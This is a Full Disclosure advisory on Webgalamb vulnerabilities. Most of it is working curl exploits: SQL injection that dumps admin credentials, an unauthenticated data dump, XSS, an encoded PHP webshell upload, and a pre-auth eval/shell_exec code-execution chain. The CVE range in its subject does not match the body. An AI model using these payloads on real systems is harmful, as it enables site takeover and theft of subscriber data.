[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] CVE-2018-19509-19513: multiple vulnerabilities (incl. critical pre-auth RCE) in Webgalamb
- To: "fulldisclosure@xxxxxxxxxxxx" <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] CVE-2018-19509-19513: multiple vulnerabilities (incl. critical pre-auth RCE) in Webgalamb
- From: Daniel Jones via Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
- Date: Wed, 02 Jan 2019 06:56:55 +0000
Summary
-------
Vendor: E.N.S. Zrt (www.ens.hu)
Product: Webgalamb (www.webgalamb.hu, www.facebook.com/webgalamb)
Webgalamb is a commercial email marketing software for managing subscription
lists and sending out bulk emails. It is not SaaS but a PHP based web
application that is typically hosted next to the company website of Webgalamb
customers.
Webgalamb is prone to be vulnerable to multiple security flaws that could be
exploited by threat actors to take over the complete control of Webgalamb
deployments, company websites and also to exfiltrate the email subscription
databases.
The findings had been verified with latest Webgalamb versions (v6 and v7),
older versions are probably also affected. The vendor confirmed the
vulnerabilities but the remediation plan was not shared.
CVE-2018-19513 Information disclosure
-------------------------------------
The log files created by the application are exposed to the internet. The file
names are predictable. For example:
http://www.victim.tld/webgalamb/files/logs/sql_error_log/2018-10-25-sql_error_log.log
The logfile could contain sensitive client data (email addresses) and also
facilitates exploitation of SQL injection errors.
CVE-2018-19510: SQL injection in insert via Client-IP HTTP header
-----------------------------------------------------------------
curl -d "mail=test2@xxxxxxx&save=1" --header "Client-Ip: 'foo" -v
"http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83";
In the SQL log:
2018-10-25 18:06:38 - Url:
http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83
Bad SQL:[insert into `wg7_users` ( mail, omail, mail_id, ip, ip_orig, datum,
verify_code, active, g, a, ipdatum ) values
( 'test2@xxxxxxx',
'test2@xxxxxxx', '3', ''foo', ''foo', CURDATE(),
'k7k64a8kk71811fcb841k71k1f5ffda16ec96eff', '1', '1', '1', now() )]/You have an
error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near 'foo', ''foo', CURDATE(),
'k7k64a8kk71811fcb841k71k1f5ffda16ec96eff', '1', '1', '' at line 2 :
(c:\htdocs\webgalamb\subscriber.php:2241)
Example of a meaningful SQL injection:
curl -d "mail=test4@xxxxxxx&save=1" --header "Client-Ip: ', 5,CURDATE(), 7,
1,9,10, now()), ((SELECT GROUP_CONCAT(conf_value) FROM
wg7_config),2,3,4,5,CURDATE(),7,8,65535,1,NOW()) -- foo" -v
"http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83";
An UPDATE wg7_users SQL expression is also vulnerable to the same pattern; it
is possible to modify any user subscriptions.
CVE-2018-19515: Authentication bypass
-------------------------------------
The system/ajax.php script offers various functionality, which is supposed to
be available for the administrator of the system only.
However, by using one of the bgsend, atment_sddd1xGz or the xls_bgimport query
parameters, most of these methods become available.
For exploitation, see the next examples.
Dumping the database (email addresses of subscribed users), without
authentication:
curl -d "uidselect=&g=1"
http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1
Response:
<a href="#" onclick="$('#un').val('test@xxxxxxx '); $('#u_ID').val('1');
return false;">test@xxxxxxx</a>
Combining the vulnerabilities above it is possible to exfiltrate any data from
the system:
curl -d "uidselect=&g=65535"
http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1
Response:
<a href="#"
onclick="$('#un').val('*4AD47E08DAE2BD4F0977EED5D23DC901359DF617,webgalamb/,0,,7.0.0,0,50,foo@xxxxxx,foo@xxxxxx,2018-10-23,,,,200,300,2018.10.23.
18:15:49,www.victim.tld,10000,0,0,80,30,0,2018-10-23,0,,g_admin,15000,500,5,127.0.0.1,,,,,,,,,,,,0,
'); $('#u_ID').val('14'); return
false;">*4AD47E08DAE2BD4F0977EED5D23DC901359DF617,webgalamb/,0,,7.0.0,0,50,foo@xxxxxx,foo@xxxxxx,2018-10-23,,,,200,300,2018.10.23.
18:15:49,www.victim.tld,10000,0,0,80,30,0,2018-10-23,0,,g_admin,15000,500,5,127.0.0.1,,,,,,,,,,,,0,</a>
Note, the response above in this case contains the result of the previously
executed config group concat action of wg7_config table, which also includes
the password of the administrator (stored via MySQL's PASSWORD() function).
CVE-2018-19509: Persistent XSS, targeting the administrator
-----------------------------------------------------------
The Webgalamb application seems to make some opportunistic calls to
htmlspecialchars() instead of using any templating engines with proper
contextual encoding.
Since it is possible to insert arbitrary strings to the database, any
JavaScripts could be executed by the administrator.
curl -d "mail=test5@xxxxxxx&save=1" --header "Client-Ip: ', 5,CURDATE(), 7,
1,9,10, now()),
(char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,60,47,115,99,114,105,112,116,62),2,3,4,5,CURDATE(),7,8,1,1,NOW())
-- foo" -v "http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83";
view-source:http://www.victim.tld/webgalamb/wg7.php?subscriber_ID=20&g=1&new_subscriber=1&link=g%3D1%26subscribers%3D1
...
<h2><script>alert(document.domain)</script> feliratkozó adatai</h2>
...
The same XSS attack could be mounted via another entry points as well.
CVE-2018-19511: CSRF
--------------------
The application does not feature any security measures to prevent CSRF attacks.
An external, attacker controlled site could submit a POST HTTP request to
http://www.victim.tld/webgalamb/wg7.php?options=1 in the context of an
authenticated administrator to change the administrator password and take over
the control of a Webgalamb installation.
CVE-2018-19512: Arbitrary code execution (as authenticated administrator)
------------------------------------------------------------------------------------
curl -v --header "Cookie: PHPSESSID=762b286eef672d9b618894b7f47a20ca;
webgalamb6=3s4kcr7r7r5i47e68002r7ofn5" -F "file=@test-exploit.wgx"
http://www.victim.tld/webgalamb/system/ajax.php?wgmfile=1
Where test-exploit.wgx is:
@WGMX
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48d2d4PjxpbWFnZXM+PGltYWdlPjxuYW1lPi4uL3B3bmQucGhwPC9uYW1lPjxmaWxlPlBEOXdhSEFLY0dod2FXNW1ieWdwT3dvL1BnPT08L2ZpbGU+PC9pbWFnZT48L2ltYWdlcz48L3dneD4=
The code then can be executed via the following HTTP call:
http://www.victim.tld/webgalamb/files/images/pwnd.php
CVE-2018-19514 Arbitrary remote code execution without authentication
---------------------------------------------------------------------
Uploading a CSV file:
curl -v -F "file=@import.csv" -F "g=1"
"http://www.victim.tld/webgalamb/system/ajax.php?import_fupl=1&atment_sddd1xGz=1";
It is placed here:
http://www.victim.tld/webgalamb/files/feltolt.csv
Processing the file and inserting its lines to the wg7_import table:
curl -v --header "Cookie: webgalamb6=pid" -d "xls_converz=1" -d "g=1"
-d "exp=.csv"
"http://www.victim.tld/webgalamb/system/ajax.php?atment_sddd1xGz=1";
Processing it (inserting the data to the fields table):
curl -v
"http://www.victim.tld/webgalamb/system/ajax.php?xls_bgimport=1&pid=pid&g=1&X=0&Y=0";
The exploit payload looks like this (import.csv):
',eval($_SERVER[HTTP_C]),'{{int}}
After it was processed, arbitrary commands can be executed via the subscription
form:
curl -d "mail=test1@xxxxxxx&save=1" --header "C: die(phpinfo());" -v
"http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83";
curl -d "mail=test1@xxxxxxx&save=1" --header "C:
die(shell_exec('whoami'));" -v
"http://www.victim.tld/webgalamb/subscriber.php?g=1&f=b187b56a83";
Timeline
--------
10/27/2018: Initial contact attempt with the vendor
10/31/2018: Second attempt with additional email addresses
10/31/2018: Initial feedback from the vendor, confirming the channel is
appropriate for receiving the report
10/31/2018: Report submitted
11/12/2018: Ping
11/12/2018: Webgalamb acknowledging the vulnerabilities
11/12/2018: Communicating planned date of public disclosure once again
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/